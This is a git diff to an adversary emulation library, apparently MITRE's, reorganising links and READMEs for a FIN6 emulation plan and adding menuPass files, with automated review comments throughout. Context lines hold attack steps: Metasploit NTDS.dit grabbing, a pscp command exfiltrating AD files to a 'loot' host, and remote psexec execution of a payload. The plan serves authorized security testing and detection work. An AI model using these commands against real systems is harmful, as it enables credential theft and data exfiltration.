-Another technique reportedly used by FIN6 to achieve credential access and escalate privileges is to copy and exfiltrate the Active Directory NTDS.dit file.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) Reporting indicates that on at least one occasion, the group is believed to have used Metasploit's psexec_ntdsgrab module. This module authenticates to the domain controller, creates a volume shadow copy of the system drive, and downloads copies of the NTDS.dit and SYSTEM hive. Although this technique is herein classified as a privilege escalation technique, the group may execute this module during discovery and exfiltrate the resultant files with the rest of their discovery results.[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)
+Another technique reportedly used by FIN6 to achieve credential access and escalate privileges is to copy and exfiltrate the Active Directory NTDS.dit file.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) Reporting indicates that on at least one occasion, the group is believed to have used Metasploit's psexec_ntdsgrab module. This module authenticates to the domain controller, creates a volume shadow copy of the system drive, and downloads copies of the NTDS.dit and SYSTEM hive. Although this technique is herein classified as a privilege escalation technique, the group may execute this module during discovery and exfiltrate the resultant files with the rest of their discovery results.[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)
-Hashes must be retrieved from the NTDS.dit file. There are a number of openly available tools that are capable of parsing this file, [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) is one such tool. As this step is done locally and offline, the choice is left to the analyst.
+Hashes must be retrieved from the NTDS.dit file. There are a number of openly available tools that are capable of parsing this file, [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) is one such tool. As this step is done locally and offline, the choice is left to the analyst.
##### FIN6 Procedure
@@ -198,7 +198,7 @@ msf> use auxiliary/admin/smb/psexec_ntdsgrab
##### Windows Credential Editor
-In addition to Mimikatz and psexec_ntdsgrab, FIN6 is reported to use WCE to access credentials.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) The command below dumps cleartext passwords stored by the digest authentication package.
+In addition to Mimikatz and psexec_ntdsgrab, FIN6 is reported to use WCE to access credentials.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) The command below dumps cleartext passwords stored by the digest authentication package.
##### FIN6 Procedure
@@ -243,9 +243,17 @@ Example: C:\>plink -ssh root@192.168.101.1
```sh
pscp -P {port} c:\windows\temp\ad_* root@192.168.101.1:/temp/loot
```
----
-## Next Steps
+---
-- [FIN6 Operations Flow](/fin6/Operations_Flow.md)
-- [FIN6 Phase 2](/fin6/Emulation_Plan/Phase2.md)
\ No newline at end of file
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
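Review bot: the rewritten block still ends without a trailing newline (`\ No newline at end of file` follows `+* [Change Log](...)`, just as it did after the removed `- [FIN6 Phase 2](...)`); add the newline now so the next edit to this file does not show a spurious change on the `Change Log` line. The `----` to `---` swap is cosmetic (both are a Markdown thematic break) but it matches the three-dash rule used in the other files, which is fine. Note that the removed `## Next Steps` list pointed only onward (`Operations Flow`, `Phase 2`, which suggests this is Phase1.md), whereas the new `Additional Plan Resources` list links every page of the plan including the current one; either drop the self-link or keep a one-line "next" hint so the reading order is not lost.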
diff --git a/fin6/Emulation_Plan/Phase2.md b/fin6/Emulation_Plan/Phase2.md
index 36a3a557..9b678b3f 100644
--- a/fin6/Emulation_Plan/Phase2.md
+++ b/fin6/Emulation_Plan/Phase2.md
@@ -357,3 +357,17 @@ FIN6 Procedure
```sh
psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
```
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
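Review bot: `+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)` in Phase2.md's `Additional Plan Resources` is a link to the page itself; render the current page as plain text or omit it (the same pattern recurs in every file this PR touches). The file is also still written without a trailing newline (`\ No newline at end of file` after the last `+` line); this is the right moment to add it.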
diff --git a/fin6/Emulation_Plan/README.md b/fin6/Emulation_Plan/README.md
index 227d9ea4..86294bc0 100644
--- a/fin6/Emulation_Plan/README.md
+++ b/fin6/Emulation_Plan/README.md
@@ -1,19 +1,44 @@
-# FIN6 Emulation Plan
+# FIN6 Adversary Emulation
-This folder contains the core components of the FIN6 emulation plan. Each component is summarized below, explained in detail in the recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing this emulation plan's release, and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
+This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
-The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their Operations in two major Phases:
+FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015. FIN6 has targeted e-commerce sites and multinational organizations. Most of the group’s targets have been located in the United States and Europe, but include companies in Australia, Canada, Spain, India, Kazakhstan, Serbia, and China.[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)
-- Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (eg credentials).
+The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical order of the major steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their operations in two major phases:
+
+- Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (e.g. text files resulting from Discovery and credentials).
- Phase 2: This phase consists of the specific objectives or effects of the operation. We provide three potential options for specific objectives, based on historical FIN6 operations.
-The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version, yet remains universal/agnostic of any specific parser and runner. We will accept PRs to capture versions of the YAML ported to work with specific execution frameworks [here](YAMLs).
+The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
## Table of Contents
-- [Intelligence Summary](/fin6/Intelligence_Summary.md)
-- [Operations Flow](/fin6/Operations_Flow.md)
-- [Emulation Plan](/fin6/Emulation_Plan/README.md)
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
- [Phase 1](/fin6/Emulation_Plan/Phase1.md)
- [Phase 2](/fin6/Emulation_Plan/Phase2.md)
- - [YAML](/fin6/Emulation_Plan/FIN6.yaml)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
+Copyright 2020 MITRE Engenuity. Approved for public release. Document number CT0006
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
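Review bot: after this hunk `fin6/Emulation_Plan/README.md` is byte-identical to `fin6/README.md` (this diff's `index 227d9ea4..86294bc0` and the `fin6/README.md` diff's `index 16f4b50a..86294bc0` end at the same blob), so the folder-level README no longer says anything about the folder, and its Table of Contents entry `+* [Emulation Plan](/fin6/Emulation_Plan/README.md)` now links to itself. The removed intro (`-This folder contains the core components of the FIN6 emulation plan...`) and the removed sentence inviting PRs for YAML ported to specific execution frameworks were the only content unique to this page; suggest keeping a short folder description plus a link to the top-level README instead of a verbatim copy, so the two do not drift apart again. Minor: `+Copyright 2020 MITRE Engenuity. Approved for public release. Document number CT0006` and `+This project makes use of ATT&CK®` lack terminal punctuation.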
diff --git a/fin6/Emulation_Plan/YAML/README.md b/fin6/Emulation_Plan/YAML/README.md
deleted file mode 100644
index 422e8668..00000000
--- a/fin6/Emulation_Plan/YAML/README.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# Machine-Readable FIN6 Emulation Plans
-
-The universal, technology-agnostic version of the FIN6 emulation plan YAML is provided [here](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml). This folder will store versions of this file formated to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
-
-## Included Formats
-
-As new files are added, please list them in the below table.
-
-| File | Execution Framework | Notes |
-| --- | --- | --- |
-| Link_To_File | Execution_Framework_Name | Any additional notes/tips for usage |
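Review bot: this deletion, together with the `rename from fin6/Emulation_Plan/FIN6.yaml` / `rename to fin6/Emulation_Plan/yaml/FIN6.yaml` entry that follows, amounts to a case-only rename of the `YAML` directory to `yaml`. On case-insensitive filesystems (default on macOS and Windows) git can leave a stale `YAML/` checkout behind or report the directory as already existing; call this out in the PR description and, if any contributor hits it, the usual workaround is a two-step `git mv` through a temporary name. Also check that nothing else in the repository still links to `Emulation_Plan/YAML` or to the old blob URL `.../blob/master/fin6/Emulation_Plan/FIN6.yaml` that this deleted README used, since that URL will 404 once the rename lands on master.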
diff --git a/fin6/Emulation_Plan/FIN6.yaml b/fin6/Emulation_Plan/yaml/FIN6.yaml
similarity index 100%
rename from fin6/Emulation_Plan/FIN6.yaml
rename to fin6/Emulation_Plan/yaml/FIN6.yaml
diff --git a/fin6/Emulation_Plan/yaml/README.md b/fin6/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..ff9ca56e
--- /dev/null
+++ b/fin6/Emulation_Plan/yaml/README.md
@@ -0,0 +1,25 @@
+# Machine-Readable FIN6 Emulation Plans
+
+The universal, technology-agnostic version of the FIN6 emulation plan YAML has been provided as starting point for machine parsing and execution of the FIN6 emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [FIN6.yaml](/fin6/Emulation_Plan/yaml/FIN6.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
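Review bot: grammar in the intro line: `+The universal, technology-agnostic version of the FIN6 emulation plan YAML has been provided as starting point ...` needs an article (`as a starting point`), and `this yaml file` should read `this YAML file` to match the heading and table. In the `Included Formats` table the row `+| [FIN6.yaml](/fin6/Emulation_Plan/yaml/FIN6.yaml) | N/A | Initial Emulation Plan YAML |` puts `N/A` under `Execution Framework`; something like `None (parser-agnostic)` would tell a reader why, given that the paragraph above says this folder is meant to hold runner-specific versions. The `Additional Plan Resources` entry `+ - [YAML](/fin6/Emulation_Plan/yaml)` points back at this folder, the same self-link pattern as the other files.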
diff --git a/fin6/Intelligence_Summary.md b/fin6/Intelligence_Summary.md
index 398cff44..16d7d5a5 100644
--- a/fin6/Intelligence_Summary.md
+++ b/fin6/Intelligence_Summary.md
@@ -109,7 +109,14 @@ ID | Source | Publisher | Date |
---
-## Next Steps
-
-- [FIN6 Operations Flow](/fin6/Operations_Flow.md)
-- [FIN6 Phase 1](/fin6/Emulation_Plan/Phase1.md)
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
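Review bot: `+* [Intelligence Summary](/fin6/Intelligence_Summary.md)` is a self-link on the Intelligence Summary page, and the file still has `\ No newline at end of file` after `+* [Change Log](...)`. The removed `## Next Steps` block sent the reader on to Operations Flow and Phase 1; since the Intelligence Summary is the entry point of the plan, consider keeping that reading-order hint above the new site-map style list.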
diff --git a/fin6/Operations_Flow.md b/fin6/Operations_Flow.md
index 70bd777c..bdc59e3d 100644
--- a/fin6/Operations_Flow.md
+++ b/fin6/Operations_Flow.md
@@ -14,7 +14,7 @@ This FIN6 emulation is split into two distinct phases, [Phase 1](/fin6/Emulation
## Initial Access
-Phase 1 is the pursuit of enabling objectives, the first of which is initial access to the target network. FIN6 appears to take a pragmatic approach toward delivery, varying techniques according to what is most likely to be successful. It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.
+Phase 1 is the pursuit of enabling objectives, the first of which is initial access to the target network. FIN6 appears to take a pragmatic approach toward delivery, varying techniques according to what is most likely to be successful. It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.
For teams that intend to emulate the threat for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective. Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation. For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources. For these assessors, it is recommended that you assume breach using the C2 framework of your choice. FIN6 has made use of CobaltStrike and Metasploit. Koadic C2 may be a good option to emulate the more_eggs implant. FIN6 is reported to have maintained C2 over HTTPS.
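Review bot: the `+` line keeps the misplaced comma in `It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.`; it should be `It is therefore recommended, for the purpose of threat emulation, that ...`. Otherwise this `-`/`+` pair is content-identical (trailing whitespace only).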
@@ -24,11 +24,11 @@ After gaining access to the target network, FIN6 enumerates the network and Acti
## Privilege Escalation
-The third objective of Phase 1 is to escalate privileges. Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks. FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file. The information therein enables the group to move freely throughout the domain and pursue their Phase 2 objectives. Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully. In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
+The third objective of Phase 1 is to escalate privileges. Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks. FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file. The information therein enables the group to move freely throughout the domain and pursue their Phase 2 objectives. Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully. In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
## Exfiltration
-The terminating event for Phase 1 is exfiltration of Phase 1 data. FIN6 has exfiltrated the text files resultant from Discovery and the NTDS.dit file harvested during Privilege Escalation by way of SSH and FTP. These files are reported to have been pushed to FIN6 controlled infrastructure for processing and analysis. The information ascertained enables the group to pursue their Phase 2 objectives.
+The terminating event for Phase 1 is exfiltration of Phase 1 data. FIN6 has exfiltrated the text files resultant from Discovery and the NTDS.dit file harvested during Privilege Escalation by way of SSH and FTP. These files are reported to have been pushed to FIN6 controlled infrastructure for processing and analysis. The information ascertained enables the group to pursue their Phase 2 objectives.
---
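Review bot: `Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully.` on the re-added `+The third objective of Phase 1 ...` line is a comma splice; use a semicolon or start a new sentence. Both pairs in this hunk are otherwise identical to the lines they replace, so as with the other whitespace-only hunks the fix could ride along in the same touch.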
@@ -40,12 +40,18 @@ Escalating privileges during Phase 1 may require lateral movement. The lateral
## Exfiltration
-The terminus of this phase and likewise, this emulation plan is the exfiltration of Phase 2 data. FIN6 has used DNS tunneling to exfiltrate PoS data. When targeting e-commerce sites, the group’s card skimming scripts exfiltrate payment data by using an HTTP POST to send the data to FIN6 controlled infrastructure.
+The terminus of this phase and likewise, this emulation plan is the exfiltration of Phase 2 data. FIN6 has used DNS tunneling to exfiltrate PoS data. When targeting e-commerce sites, the group’s card skimming scripts exfiltrate payment data by using an HTTP POST to send the data to FIN6 controlled infrastructure.
---
-## Next Steps
-
-- [FIN6 Intelligence Summary](/fin6/Intelligence_Summary.md)
-- [FIN6 Phase 1](/fin6/Emulation_Plan/Phase1.md)
-- [FIN6 Phase 2](/fin6/Emulation_Plan/Phase2.md)
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml/FIN6.yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
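Review bot: the `YAML` entry here, `+ - [YAML](/fin6/Emulation_Plan/yaml/FIN6.yaml)`, points at the file, while every other `Additional Plan Resources` block added in this PR (Phase1, Phase2, both READMEs, Intelligence_Summary) points at the directory `/fin6/Emulation_Plan/yaml`; pick one target and use it everywhere, otherwise a future path change will be missed in one place. Separately, this file has two `## Exfiltration` headings (one in the Phase 1 section, one in Phase 2, both visible as context in these hunks); GitHub will generate `#exfiltration` and `#exfiltration-1`, so any hand-written link to the Phase 2 exfiltration section will silently land on Phase 1. Renaming them (`Phase 1 Exfiltration` / `Phase 2 Exfiltration`) avoids that.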
diff --git a/fin6/README.md b/fin6/README.md
index 16f4b50a..86294bc0 100644
--- a/fin6/README.md
+++ b/fin6/README.md
@@ -1,26 +1,27 @@
# FIN6 Adversary Emulation
-This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
+This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015. FIN6 has targeted e-commerce sites and multinational organizations. Most of the group’s targets have been located in the United States and Europe, but include companies in Australia, Canada, Spain, India, Kazakhstan, Serbia, and China.[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)
-The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
The Operations Flow chains techniques together into a logical order of the major steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their operations in two major phases:
- Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (e.g. text files resulting from Discovery and credentials).
- Phase 2: This phase consists of the specific objectives or effects of the operation. We provide three potential options for specific objectives, based on historical FIN6 operations.
-The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
+The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
## Table of Contents
* [Intelligence Summary](/fin6/Intelligence_Summary.md)
* [Operations Flow](/fin6/Operations_Flow.md)
* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
- [Phase 1](/fin6/Emulation_Plan/Phase1.md)
- [Phase 2](/fin6/Emulation_Plan/Phase2.md)
- - [YAML](/fin6/Emulation_Plan/FIN6.yaml)
+ - [YAML](/fin6/Emulation_Plan/yaml)
* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
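Review bot: the new entry `+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)` is added to every fin6 navigation block in this PR, but no `fin6/Emulation_Plan/Infrastructure.md` appears in the diff (only `menuPass/Emulation_Plan/Infrastructure.md` is created); confirm the fin6 file already exists on `develop`, otherwise all of these links will be broken on merge. The three `-`/`+` pairs above (`This repository contains...`, `The Intelligence Summary summarizes...`, `The FIN6 emulation plan is...`) are content-identical whitespace fixes.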
diff --git a/menuPass/Attack_Layers/ChChes_S0144.png b/menuPass/Attack_Layers/ChChes_S0144.png
new file mode 100644
index 00000000..1aeeb782
Binary files /dev/null and b/menuPass/Attack_Layers/ChChes_S0144.png differ
diff --git a/menuPass/Attack_Layers/Cobalt_Strike_S0154.png b/menuPass/Attack_Layers/Cobalt_Strike_S0154.png
new file mode 100644
index 00000000..802b1709
Binary files /dev/null and b/menuPass/Attack_Layers/Cobalt_Strike_S0154.png differ
diff --git a/menuPass/Attack_Layers/EvilGrab_S0152.png b/menuPass/Attack_Layers/EvilGrab_S0152.png
new file mode 100644
index 00000000..d131e3a6
Binary files /dev/null and b/menuPass/Attack_Layers/EvilGrab_S0152.png differ
diff --git a/menuPass/Attack_Layers/Koadic_S0250.png b/menuPass/Attack_Layers/Koadic_S0250.png
new file mode 100644
index 00000000..946ffbc4
Binary files /dev/null and b/menuPass/Attack_Layers/Koadic_S0250.png differ
diff --git a/menuPass/Attack_Layers/PlugX_S0013.png b/menuPass/Attack_Layers/PlugX_S0013.png
new file mode 100644
index 00000000..8896e54e
Binary files /dev/null and b/menuPass/Attack_Layers/PlugX_S0013.png differ
diff --git a/menuPass/Attack_Layers/PoisonIvy_S0012.png b/menuPass/Attack_Layers/PoisonIvy_S0012.png
new file mode 100644
index 00000000..bd2c3bf2
Binary files /dev/null and b/menuPass/Attack_Layers/PoisonIvy_S0012.png differ
diff --git a/menuPass/Attack_Layers/QuasarRAT_S0262.png b/menuPass/Attack_Layers/QuasarRAT_S0262.png
new file mode 100644
index 00000000..0227cc28
Binary files /dev/null and b/menuPass/Attack_Layers/QuasarRAT_S0262.png differ
diff --git a/menuPass/Attack_Layers/RedLeaves_S0153.png b/menuPass/Attack_Layers/RedLeaves_S0153.png
new file mode 100644
index 00000000..3aac9a27
Binary files /dev/null and b/menuPass/Attack_Layers/RedLeaves_S0153.png differ
diff --git a/menuPass/Attack_Layers/menuPass_G0045.png b/menuPass/Attack_Layers/menuPass_G0045.png
new file mode 100644
index 00000000..b79fa193
Binary files /dev/null and b/menuPass/Attack_Layers/menuPass_G0045.png differ
diff --git a/menuPass/CHANGE_LOG.md b/menuPass/CHANGE_LOG.md
new file mode 100644
index 00000000..71c756e7
--- /dev/null
+++ b/menuPass/CHANGE_LOG.md
@@ -0,0 +1,7 @@
+# Change Log
+
+## menuPass Emulation Plan
+
+|Version | Date | Change Details |
+|:---|:---|:---|
+| 1.0 | 04 February 2021 | Adversary Emulation Library Release
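Review bot: the data row `+| 1.0 | 04 February 2021 | Adversary Emulation Library Release` is missing the closing `|` that the header row `+|Version | Date | Change Details |` and the separator row have; GFM renders it either way, but keep the rows consistent so later entries copy a complete row.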
diff --git a/menuPass/Emulation_Plan/Infrastructure.md b/menuPass/Emulation_Plan/Infrastructure.md
new file mode 100644
index 00000000..584ce0b4
--- /dev/null
+++ b/menuPass/Emulation_Plan/Infrastructure.md
@@ -0,0 +1,86 @@
+# Infrastructure
+
+menuPass actors are reported to have maintained distributed infrastructure that is often associated with dynamic-DNS or actor registered domains. This infrastructure may have been maintained and reused across disparate operations.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) menuPass infrastructure is used for phishing, command and control (C2), payload hosting/delivery, and exfiltration.
+
+---
+
+## Emulation Team Infrastructure
+
